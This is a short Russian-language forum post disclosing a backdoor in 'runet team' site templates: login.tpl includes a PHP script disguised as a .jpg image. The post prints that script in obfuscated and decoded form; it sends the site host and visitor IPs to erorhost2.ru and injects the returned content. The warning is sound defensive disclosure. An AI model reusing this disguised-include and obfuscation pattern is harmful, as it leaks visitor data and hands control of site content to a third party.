Во многих шаблонах от *runet team* спрятан php код который тырит траф.
Откройте login.tpl там есть такая строчка:
$void = include ($tpl->dir.'/images/ico/kontasa.jpg');
$get_good = $void;
if (isset($get_good) == true)
{ $login_panel = $void;
[code]
открываем это изображения через блокнот и видем php скрипт:
[code]
<?php
$x0f="f\151\x6c\x65"; $x10="\146\x73\157ck\157\160\145\156"; $x11="\x69\x6dp\x6co\144\145";
$x0b = @$x10("\145ro\x72\150\157\x73\1642\056r\x75", 80, $x0c, $x0d, 6); if(!$x0b){return ''; }else{$x0e = @$x0f("\x68\x74tp:\x2f/\145r\x6f\x72\150o\x73t2.\x72\165\x2fid\x31\x2e\x7 0h\160?si\x74e=$_SERVER[HTTP_HOST]&i\160=$_SERVER[REMOTE_ADDR]");return $x11('',$x0e); }?>
Расшифрованный вариант:
<?php
$fp = @fsockopen("erorhost2.ru", 80, $errno, $errstr, 6);
if (!$fp)
{
return '';
} else
{
$page = @file("http://erorhost2.ru/id1.php?site=" . $_SERVER[HTTP_HOST] . "&ip=" .
$_SERVER[REMOTE_ADDR]);
return implode('', $page);
}
?>
